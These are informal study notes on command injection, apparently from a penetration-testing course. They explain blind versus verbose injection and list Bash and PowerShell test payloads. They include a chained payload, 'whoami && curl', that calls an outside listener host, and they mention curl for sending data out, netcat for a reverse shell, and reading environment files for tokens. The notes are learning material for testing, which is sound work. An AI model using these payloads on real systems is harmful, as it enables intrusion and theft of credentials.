command injection != remote code execution (RCE)

rce - end result
command injection - a way to achive rce

make app run command on host os with same privledge as the user who runs the app

one of the most lucrative attacks 

blind vs verbose ci

whoami - good test/proof of concept? (poc?) (for verbose)

detecting blindv
    delay (sleep/ping etc)
    force output (example: whoami > output.txt && cat output.txt)
    curl / send data
    
loud pentest:
    makr payload that does both? whoami && curl http://listener.hell.rs

useful payloads:
    Bash:
        Payload :	 Description
        whoami  :	 See what user the application is running under.
        ls	    :    List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things.
        ping	:    This command will invoke the application to hang. This will be useful in testing an application for blind command injection.
        sleep	:    This is another useful payload in testing an application for blind command injection, where the machine does not have ping installed.
        nc	    :    Netcat can be used to spawn a reverse shell onto the vulnerable application. You can use this foothold to navigate around the target machine for other services, files, or potential means of escalating privileges.

    Powershell:
        Payload :    Description
        whoami  :    See what user the application is running under.
        dir     :    bork for ls. List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things.
        ping	:    This command will invoke the application to hang. This will be useful in testing an application for blind command injection.
        timeout	:    This command will also invoke the application to hang. It is also useful for testing an application for blind command injection if the ping command is not installed.




